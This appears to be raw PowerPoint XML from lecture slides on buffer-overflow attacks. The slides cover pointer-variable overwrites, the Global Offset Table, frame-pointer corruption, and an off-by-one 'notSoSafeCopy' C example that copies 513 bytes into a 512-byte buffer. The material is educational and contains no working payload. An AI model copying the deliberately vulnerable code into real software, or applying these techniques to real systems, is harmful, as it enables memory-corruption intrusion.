                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A304FA89-0254-F743-BC82-3E61FA5E1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3188" y="5835650"/>
            <a:ext cx="213712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prstDash val="dash"/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(elsewhere in memory)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95A94E-F112-F44D-BF1F-64073F1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Pointer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158905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095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75" name="Group 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99008591-674F-7346-8230-4B0CC998E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508777"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7246938" y="1557338"/>
          <a:ext cx="2881312" cy="4470400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2881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args               </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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(funcp)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return address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SFP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pointer var       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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(ptr)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buffer               (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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4362" name="Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21259B6-3EBD-134C-9814-EF67EB81B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2060575"/>
            <a:ext cx="1800225" cy="1296988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2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Attack code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18471" name="AutoShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437AAA0B-340A-7D40-B010-1ABFD3DB8F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="14362" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3179764" y="2060576"/>
            <a:ext cx="4067175" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12722"/>
              <a:gd name="adj2" fmla="val 117245"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63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8499" name="Group 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E51DAAE-4984-4A47-B3FE-BEB1CBCAE8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507887"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4586288" y="2708275"/>
          <a:ext cx="1727200" cy="1006476"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="172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4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Syscall</a:t>
                      </a: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 pointer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491" name="Text Box 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E814D4-1F0D-6C4A-8213-E55F6A356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0238" y="2362200"/>
            <a:ext cx="2017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ja-JP" sz="16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  Global Offset Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18500" name="Text Box 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB99EA1B-C752-8C4D-9CFC-9F686AA49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1" y="2917826"/>
            <a:ext cx="3603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AutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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　</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18501" name="Text Box 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20172D41-1253-3A46-ABDD-3ED1FDBF7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1" y="4038601"/>
            <a:ext cx="358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AutoNum type="circleNumDbPlain" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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　</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18503" name="AutoShape 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5894B302-3BE3-504F-BAE9-96F006DEB37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6313488" y="3124201"/>
            <a:ext cx="933450" cy="1393825"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 79421"/>
            </a:avLst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04" name="AutoShape 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E55339E-D81F-1E4B-A02F-8F3D59207E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="14362" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4079876" y="2709863"/>
            <a:ext cx="506413" cy="501650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49843"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"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78" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8476CB8A-D722-1944-9F4D-9FB035B5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Attack #2: Pointer Variables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C41C98-57F7-AF45-9704-3783B3FD210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079876" y="3211514"/>
            <a:ext cx="3167063" cy="1817687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72" name="Text Box 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C4ECD9-3452-9848-A0BC-634EA465D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243" y="3719515"/>
            <a:ext cx="508635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Font typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="circleNumDbPlain"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Change a function pointer to point to attack code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Any memory</a:t>
            </a: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, on or off the stack, can be modified by a statement that stores a value into the compromised pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:b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</a:b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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, str);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>      *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>[0];</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218310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8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85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91" grpId="0"/>
      <p:bldP spid="18500" grpId="0"/>
      <p:bldP spid="1850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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5AD8F5-4547-3E4A-BBEF-E4D680702F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1810764"/>
            <a:ext cx="8458200" cy="35052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000" dirty="0"/>
              <a:t>Home-brewed range-checking string copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"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 sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>notSoSafeCopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(char *input) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts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  		      char buffer[512]; int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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             for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;=512; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>++)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                 buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] = input[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]; 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        }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        void main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]) {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             if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==2) 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                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>notSoSafeCopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"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        }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/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E394D0C0-244E-8D47-A56F-F6703AD75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Off-By-One Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1489925" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{335317B6-C576-AB4F-AA10-A14378006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75" y="5223428"/>
            <a:ext cx="10682288" cy="110966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342900" indent="-3429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marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1-byte overflow: can’t change saved EIP, but can change saved pointer to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> stack frame… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>On a little-endian architecture, make it point back into the buffer…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>… then </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>caller’s saved EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> will be read from the buffer!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ECDC712B-249E-074A-9513-86D1D2C00A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4081464" y="2531263"/>
            <a:ext cx="6724652" cy="804862"/>
            <a:chOff x="2400" y="1413"/>
            <a:chExt cx="4236" cy="507"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15368" name="Oval 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A15EBD-DCE3-2043-887D-5660B2B15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728"/>
              <a:ext cx="192" cy="192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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15369" name="Line 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DADE455-890D-BA4C-A14E-418E98DE18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6" y="1632"/>
              <a:ext cx="2016" cy="9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0" name="Text Box 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC9D306-8221-7F4A-B60D-7D2D554973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1413"/>
              <a:ext cx="212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prstDash val="dash"/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 algn="l">
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>This will copy </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" u="sng" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>513 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>characters into the buffer. Oops!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547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9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9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2726139-8E01-A74A-B534-0E08BDD7E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1" y="3170238"/>
            <a:ext cx="2879725" cy="431800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55300" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C821BED-97D8-7542-8B08-27800F6CD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501020"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6705601" y="1557338"/>
          <a:ext cx="2881313" cy="4470400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2881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args                 (funcp)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return address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SFP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pointer var       (ptr)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buffer               (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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6411" name="Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB54FFC-8842-974F-A5FA-C0F106C21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314" y="2708275"/>
            <a:ext cx="1800225" cy="1296988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ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attack code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16412" name="AutoShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D672A2BD-69DC-8342-A1E0-D57AB08BEB50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="16411" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2892426" y="2314575"/>
            <a:ext cx="1044575" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63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13" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D0AB189-7308-6243-8902-DEBF69758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9925" y="4005263"/>
            <a:ext cx="1295400" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="27843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55389" name="Group 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE56ED7-4C45-3146-A86D-86926735B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395538"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3937001" y="2111376"/>
          <a:ext cx="2087563" cy="1108075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="208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14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pitchFamily="50" charset="-128"/>
                        </a:rPr>
                        <a:t>Fake return address</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45746" marB="4574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6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ja-JP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pitchFamily="50" charset="-128"/>
                        </a:rPr>
                        <a:t>Fake SFP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45746" marB="4574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420" name="Title 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2407EDB7-0E85-A942-B166-08A6DA95C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Attack #3: Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16421" name="Text Box 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7509FDF6-B647-6347-AD48-5C4D952A5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244" y="4869102"/>
            <a:ext cx="593328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FontTx/>
              <a:buNone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Change the caller’s saved frame pointer to point </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buNone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to attacker-controlled memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buNone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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buNone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Caller’s return address will be read from this memory.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
